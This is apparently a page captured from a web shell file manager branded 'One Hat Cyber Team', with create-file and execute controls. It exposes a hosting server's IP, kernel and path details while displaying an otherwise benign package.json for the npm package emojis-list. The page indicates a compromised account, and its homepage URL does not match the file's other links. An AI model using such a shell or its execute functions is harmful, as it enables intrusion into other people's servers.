One Hat Cyber Team
Your IP :
216.73.217.131
Server IP :
185.33.55.30
Server :
Linux cl30.webspacecontrol.com 5.14.0-611.38.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 10 17:21:28 EDT 2026 x86_64
Server Software :
Apache
PHP Version :
8.1.34
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
esetkocsi
/
www
/
node_modules
/
emojis-list
/
View File Name :
package.json
{ "name": "emojis-list", "description": "Complete list of standard emojis.", "homepage": "https://nidecoc.io/Kikobeats/emojis-list", "version": "3.0.0", "main": "./index.js", "author": { "email": "josefrancisco.verdu@gmail.com", "name": "Kiko Beats", "url": "https://github.com/Kikobeats" }, "repository": { "type": "git", "url": "git+https://github.com/kikobeats/emojis-list.git" }, "bugs": { "url": "https://github.com/Kikobeats/emojis-list/issues" }, "keywords": [ "archive", "complete", "emoji", "list", "standard" ], "devDependencies": { "acho": "latest", "browserify": "latest", "cheerio": "latest", "got": ">=5 <6", "standard": "latest" }, "engines": { "node": ">= 4" }, "files": [ "index.js" ], "scripts": { "pretest": "standard update.js", "test": "echo 'YOLO'", "update": "node update" }, "license": "MIT" }